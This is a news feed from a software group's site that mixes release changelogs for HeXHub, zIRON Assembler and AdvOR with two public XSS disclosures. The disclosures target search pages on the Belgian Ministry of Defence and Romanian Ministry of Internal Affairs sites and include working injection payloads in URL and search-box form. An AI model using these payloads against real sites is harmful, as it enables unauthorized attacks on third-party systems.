HeXHub 5.10

Changes in 5.10

- the hub address setting is no longer limited to a single address, it is now a list of addresses separated by commas; only the first address is registered to hublist registration servers and sent to hublist pingers, but all of them are used to verify the address users connected to
- new option on the "unknown commands" page: "Make sure the users have the right address in their favorites" (!set cmd ucommands verifyfavs , default is on); if this option is enabled, users who connected to the hub using an unknown address are redirected to the address that is registered to public hublists (the first address from the list that was set using !set hub addresses)
- new event for plugins: onBadSettings(userId,62) ("a wrong address was added to favorites as the address of this hub")
- the user search feature that is used by the "!seen" command was updated to work with the hublist from www.te-home.net
- GeoIP information was updated with GeoIPCountryWhois.csv from December 5th

File information: HeXHub 5.10

Posted by hexhub on 2013-12-16 18:56 ⋅ 0 comments ⋅ 0 likes

zIRON Assembler 2.0.0.5

Changes in 2.0.0.5

Assembler now shows assembled file count.
Assembler will automatically create *file*.build.bat if one does not exist.
Added directive #tryinclude, this will not fail if file does not exist.

File information: zIRON Assembler 2.0.0.5

Posted by ziron on 2013-12-13 12:54 ⋅ 0 comments ⋅ 0 likes

Ministry of Defence of Belgium - XSS

Vulnerable page: http://www.mil.be/def/search/index.asp

PoC:

Code

"><h1>XSS found by Team Elite</h1>

Code

"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in search box to reproduce the bug.

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.

Posted by Neo on 2013-12-13 02:55 ⋅ 0 comments ⋅ 0 likes

Ministry of Internal Affairs of Romania - XSS

Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=

PoC:

Code

http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E

Code

http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.

Posted by Neo on 2013-12-11 01:12 ⋅ 0 comments ⋅ 0 likes

AdvOR 0.3.0.19a

Changes in 0.3.0.19a

- corrected: possible buffer overflow when setting a huge OS version string
- corrected: when changing the default OS version, a buffer that was not allocated with tor_malloc() was freed with tor_free() (thanks to anonymous for reporting this problem on sf.net)
- corrected: a generated AS path included some extra nodes that were before the selected path in the AS tree from geoip_as.h
- the program that imports AS path definitions and generates the geoip_as.h file is now included in the source code archive (as2asm)
- the AS path tree was updated with latest AS path definitions from cidr-report.org; a few errors were corrected in the AS tree import algorithm
- geoip_c.h was updated with GeoIPCountryWhois.csv released on December 5th; there are 84715 IP ranges having 114 ranges in the fake "A1" country; 110 ranges were approximated to real countries
- updated language strings: 1248

File information: AdvOR 0.3.0.19a

Posted by advor on 2013-12-10 21:47 ⋅ 0 comments ⋅ 0 likes